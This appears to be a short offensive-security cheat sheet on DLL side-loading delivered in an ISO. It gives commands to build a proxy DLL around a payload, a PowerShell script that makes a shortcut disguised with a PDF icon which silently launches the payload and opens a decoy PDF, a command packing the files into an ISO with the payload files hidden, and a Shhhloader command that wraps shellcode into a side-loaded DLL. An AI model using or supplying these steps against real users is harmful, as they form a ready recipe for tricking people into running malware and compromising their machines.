DLL Hijacking

DLL Side-Loading with ISO Packing

Generate a proxy DLL with SharpDLLProxy:

Cmd > SharpDllProxy.exe --dll C:\Windows\System32\version.dll --payload OneDrive.Update
Cmd > move output_version\tmp1F94.dll C:\out\vresion.dll

Create a malicious link (also here):

$obj = New-object -ComObject wscript.shell
$link = $obj.createshortcut("C:\Tools\PackMyPayload\out\clickme.lnk")
$link.windowstyle = "7"
$link.targetpath = "%windir%/system32/cmd.exe"
$link.iconlocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13" # PDF ico
$link.arguments = "/c start update.exe & ""%ProgramFiles(x86)%/Microsoft/Edge/Application/msedge.exe"" %cd%/fake.pdf"
$link.save()

Pack all the files into an ISO with PackMyPayload:

PS > python .\PackMyPayload.py .\out\ .\out\a.iso --out-format iso --hide OneDriveStandaloneUpdater.exe,vresion.dll,version.dll,fake.pdf

Unlock DllMain

Tools

Shhhloader

https://github.com/icyguider/Shhhloader

$ ./Shhhloader.py -p RuntimeBroker.exe -d -dp vresion.dll -o version.dll -s domain -sa megacorp.local shellcode.bin

Last updated 3 months ago